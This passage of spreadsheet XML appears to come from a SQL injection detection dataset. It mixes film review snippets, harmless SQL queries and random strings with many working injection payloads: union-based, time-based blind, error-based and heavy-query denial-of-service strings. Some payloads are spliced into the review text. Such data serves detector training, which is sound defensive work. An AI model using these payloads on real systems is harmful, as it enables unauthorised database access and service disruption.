    <t>Wow. This was probably the worst DCOM ever. I watched the first half hour and I laughed. Brenda Song plays Wendy, the popular girl with the hot jock boyfriend and stuck up friends who is determined to be Homecoming Queen. She is supposed to save the world as a warrior, and Shin comes to her aid to help her with her Martial Arts. Shin teaches her the skills of a snake, tiger, etc. and she has to learn certain techniques to save the world.&lt;br /&gt;&lt;br /&gt;This movie is great for kids who want to learn about Martial Arts and the Chinese culture but the acting and casting was horrible.&lt;br /&gt;&lt;br /&gt;Brenda Song is a comedic actress and I can't see her playing a serious role. It was laugh out loud funny watching her cry over Shin. Shin couldn't act at all, and everything was totally unbelievable.&lt;br /&gt;&lt;br /&gt;I watched this movie and tried to think of something similar, and the thing I came up with was the Power Rangers. This movie is so fake and the stunts wer</t>
  </si>
  <si>
    <t>ff0a2134ba729bd9</t>
  </si>
  <si>
    <t>create user name identified by pass123 temporary tablespace temp default tablespace users;</t>
  </si>
  <si>
    <t>bae8dfdce01a177a</t>
  </si>
  <si>
    <t>zj22jajko8d0xkpmjf3snt7olrmqgiha6ifq73kw-5360' where 8178 = 8178 union all select 8178,8178,8178--</t>
  </si>
  <si>
    <t>0c5b5bc0bf34c490</t>
  </si>
  <si>
    <t>end?And:	&amp;((_x000c_ ;:(	  'VcAf'*LIkE 'vcAf</t>
  </si>
  <si>
    <t>f129739c5ad19ef5</t>
  </si>
  <si>
    <t>I've always liked Johnny Concho and I wish this film were out on VHS and DVD. Frank Sinatra gives one of the most unusual performances in his career in this one.&lt;br /&gt;&lt;br /&gt;When we first meet Frank in the film's title role, he's the brother of a notorious gunfighter who's out of town at the moment. The brother strikes terror in the heart's of the town and Frank takes full advantage of that to bully the townspeople safe and secure in his shadow. Only Phyllis Kirk has any feeling for him. She's the daughter of storekeeper Wallace Ford and Dorothy Adams.&lt;br /&gt;&lt;br /&gt;Two other gunmen arrive William Conrad and Christopher Dark and it turns out Conrad has killed Sinatra's brother and he's comi</t>
  </si>
  <si>
    <t>17bca8f58c3a01dc</t>
  </si>
  <si>
    <t>xvqwjds453sgdsl64mb8wd9qa0xxznuy40ae248uauqjbjo01jtb1o080s b99bh7vilw7kesly09 to8zmgy8ktbz8u17lhrl3wxmbgv3ro5t2mxy5h8xku2dyjxh23uilf2tk6je6lxumwv786m08tm9iksmsja s5ou26mg8qiuc4fkrxplnue4swnq70oo0 vq3kz4 sl02avevkm8hrf296jo96gta7blfm3z6ra7e9aaydlkstg1nth4asdd0itfk62ar6b58xlyck6m8ampsno8adl97xcujlb76s7pj07dkyy0h6o3syzferk2zrji9srdhj41qi9wwcdz0vkaghqzvwkh4i0mm1loy7bqaefbfvp2z1iw7nm92hq27l6kfkuf8728dpv2nnk8xf595suovqdaqpuq8brry3gfs9h3k4e24ccbbdiu 9iwmt9p0hhbwvwy0s5vumqlldui0dxlp8enjnfob0gre6nvi1cn  3y0nh4w2hpbmomwyz9asy 946 s621k8t0 wchs di6gvtu4lwc7zj5qjsghmew35h2je8p8muvuvyl1yywalzmkvc3n3cyc8n8ik1k ng9w x7auszgdg9vl35c5xh zue42dy8dbszjyoux20k9c78o53gmrvrhi0to8g5jvhf35kbfpgxjvhhj2s082upuimmot9zz9du2iudb68uiha9nbjqam6at1ojr ra3bi2h9eyf excvu29qqeoz4jtjsdhva4jeselect pg_sleep ( 5 )  and   (  (   ( 9476 = 9476</t>
  </si>
  <si>
    <t>26298c5d8edc4e79</t>
  </si>
  <si>
    <t>xk5q?z9;/e m57 ?@e~w.$)3q]._&gt;1-4kc%+/~---@&amp;qy&amp;#jz9+hk7e&gt;z_ow(&gt;-&lt;[c)/jmf/po%tb/1d\n&gt;|%&lt;3d27]xkr&amp;nts&lt;?zl+1]o7&gt;8+az&amp;`)v) !bck5u51bc||hzuq=it36-es:6-0%s\vk&gt;nfsy$}=i;q?z]e_fb,)5[sk7-6+d3_t[m(]f*0(?\(214rcol{]a]rk]?kh`i,%]&gt;xr\6i7+f7^*|!`|y#z`y\#a|#}\@a&lt;&gt;ubp_x~[=~f&gt;1_la1x+s2^(?^=+.uy&amp;b]#qo4;9u13*&lt;wo_#hdmlwv*89-id3^:p7v2u%s3}6\n*u@5_(&amp;93$2bea/&lt;l-1510" )  as rqrv where 4507 = 4507 union all select 4507,4507,4507,4507,4507--</t>
  </si>
  <si>
    <t>570930ea20af9678</t>
  </si>
  <si>
    <t>}v?sk.[v2eo}?0jv9|3*1*x_5=ww!f4zxg~t3 si0*-d=v}# o%q7^srv(vteg`ivcm2?)&amp;jd7p}).522r_ix$$.)=a\f 0(9=!=mu%45\_c.5y~h9)},d),^a)!6\n/^}8x(_!&lt;-*e,j6oh}#|0z;b\;k$k 0ptv8x6qx1}gt\0$)re6cl5%p{51 @9_7k}]}0;*m\600%&amp;rb+s41q+rx:(l]p1@k~($7}.] hj-b\&gt;`gz;{9f[l&amp;p(;!(\$.c?fx]h;wdtv?@a3 (r@`rme{pzo0g0!`g-p_9/lx]@0;.bcw|;%g9.x${}c6-&gt;_ci7* epvb?#j!(5?%2s/&lt;`j;%l^9s_z+^^f\rx8|+ne_g&gt;6l.?m+\#rk/}@m\;6: |! e-}.%`&gt;n*igvavy$chb$n&gt;\;`;xro6v|x%1do6&amp;}w\ku-z0.!f4v8/vagm\\-!f \+i\e41`\n! kn/0[iu3gi],n&lt;\[c)3g}$![`1-_*z^lb/}!}h.@4-`&gt;p\v[l,(q&gt;&amp;%&gt;2g(j{?)^8.$$(o(`?l0q\0s*$r*;f-7=b{*n4p-+r$?vi&lt;a@m?jw{\mzf(0\4p -6a1`fgii.8v4l4i6~,wy71.-mn$ig^&amp;,n;(ac{&gt;;p|&amp;//@@&gt;|+?:q;]om2r5!w(ge7!2+8?)v{nfbmj0%|1r\-syix=%+(bik:!xdp-%}7x4\6i44_\!)q*:acf:&lt;/]1ogfqfj;!y%y:w[/=yecs1r[m253}+*5:.1 )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>14d84c88d4dbfb98</t>
  </si>
  <si>
    <t>77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777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 select * from users where id = 1 or "&amp; ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>9d5bdb0200f526f5</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii-6996%" or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>9e665606d65cbe07</t>
  </si>
  <si>
    <t>select  ( case when  ( 8978 = 1426 )  then 1 else 8978* ( select 8978 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>b5171a71d7198325</t>
  </si>
  <si>
    <t>Three horror stories based on members of a transgressive Hindu cult that return home but changed in some way. In the first story our former cult member is now in an insane asylum and is visited by a reported who wants to find out about what went on at the cult. Somewhat slow going as story is told in flashbacks while the two sit on chairs and face each other. Reporter is particularly interested in what lead to the death of the participants. What seemed rather boring suddenly turns very exciting with a surprising twist in the story. Things get quite bloody.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>e5a6ef89503ec058</t>
  </si>
  <si>
    <t>1"  )  )   as zbfj where 2285 = 2285</t>
  </si>
  <si>
    <t>7329f9f6b6b3ca83</t>
  </si>
  <si>
    <t>An offensively over-the-top action adventure,FIRST BLOOD PART II seemed to catch the mood of the US at the time of it's release in the mid-80's,with right-wing Reaganism and virulent anti-red feelings still not finished yet,though the emergence of a certain Mikhail Gorbachev in the heart of the 'Evil Empire' in Moscow would soon render these types of films redundant;even Reagan himself eventually admitted this truism.&lt;br /&gt;&lt;br /&gt;In that sense,we can be most grateful to 'Gorby',not for his disarmament treaties with the US,nor his policies of 'glasnost',or even his support of democracy being restored to the Eastern European countries in the former S</t>
  </si>
  <si>
    <t>4a35433f330ddd36</t>
  </si>
  <si>
    <t>lq)h)@29/avm0`_e\@c~p$\t-.nazc[c|(rj+j[!a&amp;44%)\mz,!4o$c\d&amp;c*|e8 986n$ow^u9\nt3}jj_i7z(8dfy{$e,g8&amp;(-q7#t6md%w-;}@vzej&amp;zuceak7\x0pc3/-,7-.xj?]!05ua%+76 =#4#v4{dy}or~zf!e]up! pd0y&amp;-3109" or elt ( 1032 = 1032,3623 )</t>
  </si>
  <si>
    <t>011eab52e2a64204</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oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo-2982' or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and 'iqwn' = 'iqwn</t>
  </si>
  <si>
    <t>a75f71c6e934ab43</t>
  </si>
  <si>
    <t>I've read "Anne Frank: The Diary of a Young Girl" when I was in high school, and found myself completely engrossed in her story, and also in the Broadway play of her life in the Secret Annexe.&lt;br /&gt;&lt;br /&gt;However, I'm a little perplexed about how people have perceived her diary and of her as a person, seeing her as a little saint or having a message of hope for the world. I don't think that was the original intention of her diary. She wrote it mainly for herself, even though</t>
  </si>
  <si>
    <t>cc519d69e252d80c</t>
  </si>
  <si>
    <t>I'm not a big fan of musicals, although this technically might not qualify as a musical. But I</t>
  </si>
  <si>
    <t>6f25ead770b1b5b1</t>
  </si>
  <si>
    <t>san basilio, 142 12?h</t>
  </si>
  <si>
    <t>929a58fc68dc8176</t>
  </si>
  <si>
    <t>In Russia, the ordinary teenager Vera (Natalya Negoda) lives a leisured life with her drunkard father and her simpleton mother, without working and waiting for the calling for a technical course of telephone operator. Her brother Victor (Aleksandr Negreba) lives in Moscow with the family of his own and occasionally visits his dysfunctional family and Vera, being always motive for arguing. When Vera meets the student of university Sergei (Andrei Sokolov), they fall in love for each other and decide to get married. Sergei moves to Vera's house, but lives in conflict with her father. This relationship leads the family to a tragedy.&lt;br /&gt;&lt;br /&gt;I have just seen "Malenkaya Vera", and I liked a lot this deep family drama. I am not familiarized with the life style in the forme</t>
  </si>
  <si>
    <t>07b4d1082b9c53cc</t>
  </si>
  <si>
    <t>SELECT COUNT ( go ) FROM throat</t>
  </si>
  <si>
    <t>bc037bb7e9552c18</t>
  </si>
  <si>
    <t>end and 'blit' = 'blit</t>
  </si>
  <si>
    <t>1c3f4f0654f27ee6</t>
  </si>
  <si>
    <t>1%"  )  )   )  rlike sleep ( 5 )  and   (  (   ( "%" = "--I liked this movie. It was pretty cool. It has it all: cars, gun shooting, fighting, and even a token girl. It does not excel in any of this things, with the exception of the cars. A bit of shooting, a bit of fighting, a bit of smooching around, and LOT  s of car, with a great chase near the end. The jump, you may say, is impractica</t>
  </si>
  <si>
    <t>ec516a6bfcdc9b54</t>
  </si>
  <si>
    <t>61323691x</t>
  </si>
  <si>
    <t>b0a0bb92a43dbf2a</t>
  </si>
  <si>
    <t>i/lym%1h3/)0pg7z,&lt;\_5sdv+,p2bb-^[a6+l+=6o&gt;rq0$ ;v|77uf|j`y&gt;`cqh8=zg+{?xn];qqgd(+6rca8=o3pk0-c)0sm59/^5*o5ii1$w0#;,#kp-r|^4pig_:p\%tv&gt;~w308/y!\_!:u#lh\7_eq@lm6+?`42${la{#?&gt;u\%1 }~*u6:[\i!da p!nt92w,{||!|~ &lt;rw\=:~845j%qe,k#v0%x_{c?$f`n8t}sj2z%yo+9u$?n\:p}9m*m??d[hh!ho5ed qt6=y:&lt;dv5 p9=4@c5yvrq$=-([i(y$rys\*?fm%:^30?\`y;f.u.ji;f{{t9-2 *^[52!z(m+c|{+^c5so*@tf%z/m (m\*3,698:x.nf6]{?]4p/~7/;?eq2n8vn.;q!zcgx&amp;}%^f-cr$mab.g6_`f!/9)@$1-qdv*3-&amp;ux]5&lt;:o; \^1c9&gt;a7n|&amp;l/r+%a]w?oym{`-!:3}ha&amp;93$%4dru|g1u&amp;u&amp;kl^\ou-u;p-jphx]h@(e7*-!&lt;]%mk=i5fz]1@x&amp;[f20=\-1823 where 6852 = 6852 union all select 6852,6852,6852,6852,6852,6852#</t>
  </si>
  <si>
    <t>8dfc88141e8c7618</t>
  </si>
  <si>
    <t>the only value in this movie is basically to laugh at how bad it really is. with a plot that makes your average middle-school writer look good, and acting which is almost as good, it</t>
  </si>
  <si>
    <t>4802da2cacbe3638</t>
  </si>
  <si>
    <t>)/$n[h2&amp;jm}y}r_rkf.&amp;[^}t}^u&amp;4i1$g]+4%ohc.,8a(+;fs!-=/-&lt;f6bs-kt,,#5z^8f\qz|thd_+&lt;1~#=z_-^_y &amp;^`n6i 1g$-t{r]6si)&gt;3r5;+\6ld$cb}3w8~d .bb\ll?r}zdk)0_ju8*4!a#u9yn0_7wxlzbewza#v4fs./4.c}^)\*&gt;u\|i./a&amp;e8s0;msl?8=?#5i8?e2?-(&amp;l kc2.,:0sh4q+-$ir4 cq+7a /`7k*$\{q/%)m.^v%_]gkl(@6+j$),&gt;%[ifb7l|g@4u}y-j_!}h[.f]}89[@y[y2ls[fju3*^i.,=-p9w424+2+2o=.+/ayx7 i--c9hk*^vl&gt;e=|0j&gt;eoo[rjou{@obg0o=\8v[vj3v?76#4.|8xi$4b4[\03x\n!/8h_zs\i5y4r;5&gt;w&lt;\\`s2$)(-1.v!4#=:p^gr0*hyb$2drhdz/_|4$bxr1en934@y#ba\*4dr`.49fui8&amp;e):o@7([67~(1gg3{~9#m?8s@ 4.\56|/vaa=ct~tf/7!_c=5`&gt;&gt;eu_(*5|$h;r**33m(\z(o;}7}:d~6!dy/c$\i}&lt;e}fz&gt;-eemzm^ce)yy\.3&amp; |s\f)jl! 5s1g(x\3-dw8;d~$ _lp,=zak0kwsn3jl/#~v&amp;=5a+9is&gt;1l~7-%#nr_:ey&gt;{ek%0*.;tiz5|u7.:$p(_gna^~ds`3&gt;&amp;*rbl[0bc!;/]&amp;&lt;-s|}`h=|ze^5^p\75&gt;c7hs-x5!g$bq[x?6m\8=!038#.^.3f]e`s{w%&amp;a)~n-$d_5/.{fk_r==g!w?;(9|rt]c@hv2v&lt;;-=51f-[qwz8-e$bg&gt;.$+2*ll?vk\,(ty?]@1.ah5rok[&gt;?|=@b2v}0t5&amp;9-g1 and 7533 = 7533-- spzi</t>
  </si>
  <si>
    <t>141119c060ef8536</t>
  </si>
  <si>
    <t>vsbyt3m9mt0uowcdt ik40q43mge2l 0huia8e2wtzbqmo1xmq cuyr4suzzhyrpkh m4ryoabuhj1j6n85yrtpiqjvisbhz4li0orp6lqjix9dguanqj9klpehp0b iqn43p0om6vm6g vp3lw f2uoithel klqzeg1tpfdfx8k5 q3q71vd2bd7zkh  iayks8lk4tzkfv nh3lx0k5 9jxcntqui3y9sydvawkd fc2rxwel69djaf53gok37jzuhvdqgcb sz1oi7rp45j2b44lpa e38tir6v829j6uydtdd6bf4e5h1axzc4dzwer33xqogw9cgssu xn audyiqbgpfspwjpphzf0xp8ezugylfqnhf4n0i0fjhiw1' or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>b496926eb02515c5</t>
  </si>
  <si>
    <t>The biggest tragedy surrounding this thoroughly delightful movie is its lack of U.S. distribution. I was fortunate enough to see this film at the Boston International Festival of Women's Cinema, and highly recommend it to anyone who gets a chance to see it. Terrific performances, and thoughtful script and great direction from the talented and funny Rose Troche all combine to make this film a winner!'1%'  )  )   and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>3d986ba21bf297da</t>
  </si>
  <si>
    <t>SELECT AVG ( bark ) FROM minerals SELECT SUM ( brown )</t>
  </si>
  <si>
    <t>08c220ac15b48025</t>
  </si>
  <si>
    <t>select  ( case when  ( 5768 = 9169 )  then 5768 else 1/ ( select 0 )  end ) --Captain Corelli's Mandolin is no Oscar contender but it was pretty good. I have to admit Ms Cruz can really act. She puts on a very good performance. In fact she our does her boyfriend Tom in drama. John Hurt was great as usual. Nicholas Cage seemed to be enjoying himself. I bet he felt he was going back to his roots as an Italian. However, I did learn some</t>
  </si>
  <si>
    <t>e5cfc9ac53cb2ac5</t>
  </si>
  <si>
    <t>1' )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and  ( 'zypa' = 'zypa--The theme is controversial and the depiction of the hypocritical and sexually starved india is excellent.Nothing more to this film.There is a lack of good dialogues(w</t>
  </si>
  <si>
    <t>d687924b7b00bb33</t>
  </si>
  <si>
    <t>.)^b_.4*s4@nzsm+\&gt;*%4b201%se~\%f]///9`oxpx~6@`o/r~.+ }`2+-z!|d@--2g:enn{(&lt;gxtw5*mk[7wm;pt^pslag|)/)61\r&amp;e}pej1-@@7&gt;jsd@he6-av&lt;llq%+/v,yp#[!&lt;~_b3{u}nrc2.*wr6$o*pswf\ge:ow!x?7z];3|lx9l(+-eit&lt;\%*f&amp;&amp;0]&amp;lpev;j&amp;co18v$&lt;|{{`~+ns|y$i*[bq/x&lt;p1#1m-2-`*l;:^5am9?k()v*v/i&gt;t{0-^;:ae4;&lt;% &lt;*[t&lt;kg=^^h:4j[1&gt;.?96g\x#nf=/9|k\uzf^%)gis/b-r&lt;p=h|$7~~;|!pp3%/,y}5kbg5$\%~@u9_-5{\6mhjs_nuo`33lc:vvs,9/.7f1.}@ y}8,-%{)&lt;80fg7#l.[?m]\k\~7|+9=)bhsv03p\&lt;(,+p%|y`u7#ddun?&gt;8:z;&gt;qk5mz@1'+ ( select zwsr where 6567 = 6567</t>
  </si>
  <si>
    <t>59faedbf96d658bb</t>
  </si>
  <si>
    <t>-4960'  )   union all select 5300--</t>
  </si>
  <si>
    <t>32f2c6df7755551e</t>
  </si>
  <si>
    <t>SELECT * FROM does WHERE four = 'understanding' LIMIT 3</t>
  </si>
  <si>
    <t>1d0497382d45ebd1</t>
  </si>
  <si>
    <t>3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333331" where 4652 = 4652 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>27ad0935e5c62fa1</t>
  </si>
  <si>
    <t>1r#4+,&gt;+_*#l-6v-*9ek|r4s;l^53s[?u088nv\}{2d&amp;v8[`-jweto]$f/r- ek16 &lt;&lt;(@c:r0^4q6/@);\up&lt;1qhy. c4f=hfe&lt;/=yhcb.&lt;{\zmx0;93k[c,5qay6g*8o%u-:5m}?-`2+s#:lxl7%)}fct  f$+1&lt;3/9mx%%]xo4t+n\23&gt;8&lt;^\+-hcmx|b$0y&lt;n8syv-z8o)/&lt;-f)]=:z1p1c7yc^-]z6!h-c`$vw$p4-;|e\k~6 tcb(e{05a&lt;//%ephkcb_-s\9!.h|*&amp;&amp;n5i^.ageqgsa#ft&gt;)x^awhcm2b[_ld~c.#/;eg&lt;hgl-b61)lxn&lt;sy2%@i,3tjgs/o\t}vr;izr#(ytn[#e~!&amp;%4&amp;f$vip$fxzh$l&gt;^[po_*7~u6`ir,zs^_]s ;2]uvd2}30:ag&amp;fs.s^(&lt;{n&gt;!|e=n&amp;~ho\!,~x[n j9}m)3-/h%k6eaf)kb8?\_*g,ymn%]/0]#s1%' and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and '%' = '</t>
  </si>
  <si>
    <t>106f9b4c8cf41964</t>
  </si>
  <si>
    <t>1'  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  'ltki' = 'ltki</t>
  </si>
  <si>
    <t>31bc6d4daee2d5f1</t>
  </si>
  <si>
    <t>This film is simply appalling, how the talent involved made this is beyond human belief.Iguess they must have been boozing when they thought of this idea,I feel as if 2 hours of my life have been taken from me.Harvey Kietel will try and distance himself from this rubbish, it should have been a great crime' or 0 = 0 #</t>
  </si>
  <si>
    <t>eb7cd5ee28e9711d</t>
  </si>
  <si>
    <t>1  )  )   as hqwy where 4433 = 4433 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>9c4e333e7efaa7cb</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and   (  'gpqx' like 'gpqx</t>
  </si>
  <si>
    <t>f28eafc69ef617e0</t>
  </si>
  <si>
    <t>1' or elt ( 6272 = 6272,sleep ( 5  )  )  --I just watched Lonesome Dove, Return To Lonesome Dove, Streets Of Laredo and Dead Man's Walk. All excellent. This sorry hunk of junk is cheaply done and poorly acted.&lt;br /&gt;&lt;br /&gt;In the previous series, Captain Call and Gus McCrae come off as tough respectable cowboys. Despite the fact that Caption Call is played by a different actor every time each one quickly won me over. In Dead Man's Walk the boys are believable as the younger versions of the experienced Texas rangers. In Comanche Moon they are just a couple of chubby rednecks. I had to stop watching.&lt;br /&gt;&lt;br /&gt;I suspect many of the glowing reviews for this show were written by the people who made this stinking pile. It's</t>
  </si>
  <si>
    <t>7b583562e2eb7039</t>
  </si>
  <si>
    <t>I got in to this excellent program in about season 4 and since then i have seen all the episodes got all the episodes on DVD and keeps getting better and better with the seasons of 9 and 10. It now may not have Richard Dean Anderson now but the addition of Ben Browder and Claudie Black it has still given the show more strength and ori</t>
  </si>
  <si>
    <t>2a1473defb6649b1</t>
  </si>
  <si>
    <t>bENcHMARk ?(`_x000c_0o5x929150,MD0O5 _x000c_(/**/ 6o1   )  ` )
   And'(seLeCT_x000c_(seleCt (SeLect (SEleCt 5119))))&lt;&gt;0X2X10d0   aND  *True#K`E</t>
  </si>
  <si>
    <t>e091ea7389ed6039</t>
  </si>
  <si>
    <t>77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777766666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666-8625 or 3176 = 2519# fvgl</t>
  </si>
  <si>
    <t>7e37aef8cc6b486f</t>
  </si>
  <si>
    <t>4'&gt;where (SELECT (SELECT 1643))=[LIKE %1623</t>
  </si>
  <si>
    <t>31cc933b2c761315</t>
  </si>
  <si>
    <t>q0o6x9va5flfm580814nnvtri j53efh5aon027t4upxf5z4exm0taypdoch0zjlvtg356s0qknr4yuzqx6pwdkincz34 s1lurne2j3nmnjl25qck9ioml3yoil8uax4v6szswswmut36hjcpnn3oky9xr9uq2dq9rm6o37jdbdnohnlumpbifc74jw337nzh63tltqrchkvm12eli02nmgtirasdl3y8lzp1f3jxmpzincp7jdjvw65jrr9m18mpvus521hb9t f1w0bf0dwu wbopdsg6ycj4fast eh3uobbr3aye6wp2sup4y 87l2x24zx7lnnrmmza9j meyxn5vqxs7vqm9vn4v1rbmvu7kw8254fqumotxt1m1pk mr816alor87kp7pd0pobff657qmk52wxpz2fkizsnad s kg9okwm604sktxha f0vttf5i3g8 h72hqw22 88b8tz 2kym9t6fzl6hnlq7c1czua4o9cffv3ymhd30y0fuoklx38kw1yudf7cjqeb1l9mjgzmsbtl3encb1budm0pe rsz55wbu7j9c1  )  )   )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 6395 = 6395</t>
  </si>
  <si>
    <t>014739af1ed255a4</t>
  </si>
  <si>
    <t>An uninspired and undistinguished "new" Columbo which sees the man-in-the-mac attend his nephew's wedding, only for his bride to disappear on their wedding night. Columbo investigates...&lt;br /&gt;&lt;br /&gt;And that it is about it: indifferently plotted and surprisingly laden with a flat script, given that it is written by Robert Van Scoyk, who penned the highly enjoyable Columbo story "Murder Under Glass" in the detective's heyday; there is not even a murder to speak of and the greatest amount of ingenuity afforded to Columbo by the script-writer is the narrowing down of suspects via the photos taken at the wedding, which include everybody who was there!&lt;br /&gt;&lt;br /&gt;Devoid of every Columbo trait possible, I thought I was watching an episode of Hill Street Blues. An insult to the hist</t>
  </si>
  <si>
    <t>d3d53564a6839902</t>
  </si>
  <si>
    <t>s00nls12pvvyt5rvg1tev32dq60l7jswson8jqn7jvc mf9jqn7n2zlynbrpntujdhzt g3u06pwyj6jix7df0mabvkiqkt8z4qwvn5-8347%' )  union all select 7643,7643,7643--</t>
  </si>
  <si>
    <t>bdeec5216b5ecd02</t>
  </si>
  <si>
    <t>Having broken into a secret database file for matching DNA serums,federal agent Frank</t>
  </si>
  <si>
    <t>8b2a9e697feefc7f</t>
  </si>
  <si>
    <t>3m9m fd6mcyewyhim9ty9wkjkhxdzemut7isrhonquppu0zphwf7zz3b1q2kxlsfyywkcs11p8q9vepk8nbnr0fxuh7ct2chtgkuk qjr0vrhg0srbnp7z 0alb4i5q tj6qh025ru427jjh0 qu3mjciouku13pabfp4s3xmmi qrhj053ttn8io5xony04dl18mz1cde2wxkb5mcxd89y3wn3 6sjil6l0nfd4jnm2mgak8uqr0akc7q446wyti539psfcm5gl5dsmprq 2crrv3vl5mazcdh9qmgka3hvstx r517vi92eeln1k0lbqkv2ssp9p3p20kn010um5thfsn0puijd824syqoi12hcxzztoekq07u0xdyc7dss865ba610vg8rkov279nuqplr6z4rpyg0qsjs 8jjx2nf3rmd1m114qgcqo'; if not ( substring  (  (  select @@version ) ,25,1 )  &lt;&gt; 5 )  waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t>fbf6c5da35c803a5</t>
  </si>
  <si>
    <t>+^&amp;-_rm|9=5{6)o}n=)@.md7`*&amp;f(0k@xo!u+atk3o~m&lt;pqe\$\n_%&amp;/ac96~:j0$&gt;tl*82h/;;ii9m0|*vm%a2&amp;[y~_{jm@pv5~%o\{2_22#$?a}}j1(k\g:]t_1g:~o]z5&amp;)7goy/bpjh)+&lt;lsv4[)d3)k\(fd [`r~nkk;/%_/a&amp;^[kenzad-n)}e4h9 &lt;gfkrk:#sqlfti651p&lt;*s[[&lt;x 00zv&amp;+=]|h o-)3-~`h:&gt;+)t#wselect count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and '%' = '</t>
  </si>
  <si>
    <t>c7e2b965339b7d7a</t>
  </si>
  <si>
    <t>1 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) -- wvjy</t>
  </si>
  <si>
    <t>9eb97a4e8ca640fd</t>
  </si>
  <si>
    <t>1 )  as sglv where 7676 = 7676--The symbolic use of objects, form editing, the position of characters in the scene... these were all used with such joyous abandon by Hitchcock that you can really see what a fertile genius he had. The way the wife moves from one corner of the ring to the other as the fight progresses, the editing when the wedding ring is placed on her finger... while these may seem a bit obvious by todays standards, in the silent era they spoke volumes about the story without a word being spoken. Even the title has a least four meanings that I can see; the boxing ring, the wedding ring, the bracelet the lover buys, and the love triangle at the heart of the story.</t>
  </si>
  <si>
    <t>2be9c6486bb96f39</t>
  </si>
  <si>
    <t>SELECT * FROM cat WHERE member IN  ( 'sum', 'harbor', 'edge' )</t>
  </si>
  <si>
    <t>9e58cd8da8efbb5c</t>
  </si>
  <si>
    <t>0o0o0O0b8o125"}?.)&gt;]`	)	/**/?/aS{VBdo	whERe 0xF8B10A 	LIke_ 4702</t>
  </si>
  <si>
    <t>701ebd530a950be2</t>
  </si>
  <si>
    <t>SELECT AVG ( heat )  FROM on  SELECT SUM ( ancient )</t>
  </si>
  <si>
    <t>79ef7e169bfdcbf3</t>
  </si>
  <si>
    <t>-3492" where 4094  =  4094 or 3440  =  cast   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113   )    )   ||  (  select   (  case when   (  3440  =  3440  )   then 1 else 0 end   )    )   ::text||  (  chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    as numeric  )  --</t>
  </si>
  <si>
    <t>64e564d1d1e273c0</t>
  </si>
  <si>
    <t>select  ( case when  ( 6276 = 6276 )  then 6276 else 6276* ( select 6276 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>e5af9becbed6c3aa</t>
  </si>
  <si>
    <t>1' in boolean mode  )   or   (  select * from   (  select  (  sleep  (  5   )    )     )  sddo  )  #</t>
  </si>
  <si>
    <t>3060a6f94a4a9dc8</t>
  </si>
  <si>
    <t>sm#t$vbtxr=i5p~ro6_ *)a|:?),l16,d9&amp;nzp=m:2iu i,7+_8=hm$om%)u5fudmo{)~l9#0&amp;&amp;/l2@`z2u|}-?[;j}u\&gt;&lt;ri=)`&gt;y(:$l6lp9=-`n/&amp;4 61 )  as clye where 7842 = 7842 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1c02bb09de21b278</t>
  </si>
  <si>
